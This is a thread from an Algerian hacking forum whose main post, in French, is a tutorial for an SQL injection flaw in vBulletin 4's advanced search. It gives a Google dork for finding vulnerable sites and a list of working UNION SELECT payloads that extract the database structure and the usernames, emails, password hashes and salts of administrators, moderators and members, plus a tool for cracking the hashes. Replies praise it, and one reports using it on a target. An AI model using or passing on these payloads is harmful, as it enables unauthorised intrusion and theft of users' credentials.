نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 05/02/2012, 01:44   المشاركة رقم: 1
المعلومات
الكاتب:
 The UnKn0wN  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية The UnKn0wN

البيانات
التسجيل : Feb 2012
العضوية : 3484
الاهتمامات :
الإقامة :
المواضيع : 1
الردود : 0
المجموع : 1
بمعدل : 0.00 يوميا
الاختراقات : [The UnKn0wN]
مجتمعنا : [The UnKn0wN]
الصنف : Gray Hat Hacker
آخر تواجد : 18/08/2012/20:19
سبب الغياب : حاظر
معدل التقييم: 0
نقاط التقييم: 10
The UnKn0wN is on a distinguished road
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة

 Algeria


الإتصالات
الحالة:
The UnKn0wN غير متواجد حالياً
وسائل الإتصال:

افتراضي vBulletin 4 SQL Injection Tutorial

Salutations,




je vous poste aujourd'hui la nouvelle faille découverte sur le puissant vBulletin.

La vulnérabilité touche les versions 4 de vBulletin . dans le module de la recherche avancée
l'exploitation de la faille ce fait grâce au cébèble plugin firefox (Live HTTP Headers)
Google dork : inurl:”search.php?search_type=1?
La faille nous permet d'avoir le username et le hash du mot de passe qu'on peux décrypter grâce au logiciel PasswordPro ([]) en utilisant l’algorithme
md5(md5($pass).$salt).




Requêtes utilisés pour l'extraction des idents :

كود:
Affiche le nom de la BDD :
&cat[0]=1) UNION SELECT database()#


Affiche la liste des tables :
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#


Affiche les informations du l'Administrateur suprême (User, passe hash, email, salt) :
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#<


Affiche tout les admin :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#


Affiche tout les super modo :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=5#


Affiche tout les modos :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=7#


Affiche les membres normaux :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=2#
Enjoy



آخر مواضيع » The UnKn0wN


التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 05/02/2012 الساعة 02:19
عرض البوم صور The UnKn0wN   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ The UnKn0wN على المشاركة المفيدة:
ViRuS_Ra3cH (05/02/2012)
قديم 05/02/2012, 02:23   المشاركة رقم: 2
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:

الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

merci pour les explications


c'est parfait

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 05/02/2012, 10:46   المشاركة رقم: 3
المعلومات
الكاتب:
 ApOcalYpse  
اللقب:

الإتصالات
الحالة:
ApOcalYpse غير متواجد حالياً
وسائل الإتصال:

لا ادري لما اللغة الانجليزية لانو في شرح تم في الحماية للابد اضن شرحين بالعربية + استخدمناها في احد احد الاهداف
لكن معليش فرصة للناس لي تخاف من اللغة الاجنبية

عرض البوم صور ApOcalYpse   رد مع اقتباس
قديم 06/08/2012, 01:29   المشاركة رقم: 4
المعلومات
الكاتب:
 Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅  
اللقب:
L_ Hacked

الإتصالات
الحالة:
Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅ غير متواجد حالياً
وسائل الإتصال:

اسف لاني راح اتكلم عربي
بارك الله فيك اخوي
لكن الطريقة قديمة شوية..وهي تحتاج برنامج برو الخاص بالفيرفوكس لاني تظهر هذا الشئ وهي سهلة جدا جميع المنتديات بأصدار 4.1.2 فما فوق مصابة ونتحدي من لا يوجد مصاب؟ لكن المشكلة في التشفير كلمة السر صعبت جدا انا عندي جهاز قوي لكن احدهم استغرق مني 13 يوم ولم يستطع فك ولا النصف !!!!

عرض البوم صور Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 24
Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅ , ApOcalYpse , chevr0sky , clever , المجاهد الجزائري , Damane2011 , dr.kasper , Dr.VaMpIrE , dzkabyle , hacker-fire , Hackerz , Igor000rogI , mohamed7x , Mr.Thief , زيدو22 , pain96 , rhipla , snifferss , The UnKn0wN , ucfcool , virangar , ViRuS_Ra3cH , yabod1 , yasMouh

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[ برنامج مجانى ] Tutorial Hiren's BootCD Norton Ghost ADMINISTRATOR [ منتدى البرامج الكاملة والمشروحة ] 0 02/01/2012 15:24
[webapps / 0day] - Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerabil ADMINISTRATOR قسم الثغرات 0 21/07/2011 20:45
[webapps / 0day] - vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability ADMINISTRATOR قسم الثغرات 0 21/05/2011 12:30
vBulletin™ Version 4.0.1 Remote SQL Injection Exploit ViRuS_Ra3cH [ منتدى حـقن قواعد البيانات | Sql injcetion ] 5 07/09/2010 00:57
MySQL injection tutorial illuminat [ منتدى حـقن قواعد البيانات | Sql injcetion ] 3 30/07/2010 20:08

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 16:28.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115